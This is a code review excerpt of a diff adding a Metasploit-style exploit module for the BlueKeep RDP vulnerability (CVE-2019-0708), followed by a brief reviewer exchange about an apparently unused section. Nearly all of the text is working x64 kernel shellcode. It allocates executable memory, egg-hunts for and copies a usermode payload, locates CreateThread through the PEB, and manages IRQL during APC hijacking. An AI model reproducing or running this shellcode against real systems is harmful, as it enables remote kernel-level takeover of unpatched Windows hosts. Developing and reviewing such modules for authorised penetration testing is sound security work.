modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

```diff
@@ -0,0 +1,1095 @@
+    mov cr8, rax    ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
+    ; rdx is already address of baseAddr
+    mov [rdx], rax      ; baseAddr = 0
+    mov ecx, eax
+    not rcx             ; ProcessHandle = -1
+    mov r8, rax         ; ZeroBits
+    mov al, 0x40    ; eax = 0x40
+    push rax            ; PAGE_EXECUTE_READWRITE = 0x40
+    shl eax, 6      ; eax = 0x40 << 6 = 0x1000
+    push rax            ; MEM_COMMIT = 0x1000
+    ; reuse r9 for address of RegionSize
+    mov [r9], rax       ; RegionSize = 0x1000
+    sub rsp, 0x20   ; shadow stack
+    mov edi, #{zwallocatevirtualmemory_hash}
+    call win_api_direct
+    add rsp, 0x30
+
+    ; check error
+    test eax, eax
+    jnz _kernel_kapc_routine_exit
+
+    ;======================================
+    ; copy userland payload
+    ;======================================
+    mov rdi, [rsi]
+
+;--------------------------- HACK IN EGG USER ---------
+
+    push rdi
+
+    lea rsi, [rel shellcode_start]
+    mov rdi, 0x#{USERMODE_EGG.to_s(16)}
+
+  _find_user_egg_loop:
+      sub rsi, 0x#{CHUNK_SIZE.to_s(16)}
+      mov rax, [rsi - 8]
+      cmp rax, rdi
+      jnz _find_user_egg_loop
+
+  _inner_find_user_egg_loop:
+      inc rsi
+      mov rax, [rsi - 8]
+      cmp rax, rdi
+      jnz _inner_find_user_egg_loop
+
+    pop rdi
+;--------------------------- END HACK EGG USER ------------
+
+    mov ecx, 0x380  ; fix payload size to 0x380 bytes
+
+    rep movsb
+
+    ;======================================
+    ; find CreateThread address (in kernel32.dll)
+    ;======================================
+    mov rax, [rbp+#{data_peb_addr_offset}]
+    mov rax, [rax + 0x18]       ; PEB->Ldr
+    mov rax, [rax + 0x20]       ; InMemoryOrder list
+
+    ;lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
+    ;mov rbx, rsi    ; use rbx for iterating thread
+_find_kernel32_dll_loop:
+    mov rax, [rax]       ; first one always be executable
+    ; offset 0x38 (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
+    ; offset 0x48 (WORD)  => must be 0x18 (name len kernel32.dll)
+    ; offset 0x50  => is name
+    ; offset 0x20  => is dllbase
+    ;cmp word [rax+0x38], 0x40
+    ;jne _find_kernel32_dll_loop
+    cmp word [rax+0x48], 0x18
+    jne _find_kernel32_dll_loop
+
+    mov rdx, [rax+0x50]
+    ; check only "32" because name might be lowercase or uppercase
+    cmp dword [rdx+0xc], 0x00320033   ; 3\x002\x00
+    jnz _find_kernel32_dll_loop
+
+    ;int3
+    mov r15, [rax+0x20]
+    mov edi, #{createthread_hash}
+    call get_proc_addr
+
+    ; save CreateThread address to SystemArgument1
+    mov [rbx], rax
+
+_kernel_kapc_routine_exit:
+    xor ecx, ecx
+    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
+    mov byte [rbp+#{data_queueing_kapc_offset}], cl
+    ; restore IRQL to APC_LEVEL
+    mov cl, 1
+    mov cr8, rcx
+
+    pop r15
+    pop rsi
+    pop rdi
+    pop rbx
+    pop rbp
+    ret
+
+
+userland_start:
```

Comment:
Believe this is unused/unreferenced?

Reply:
you're right, it's an artifact from a variation of this shellcode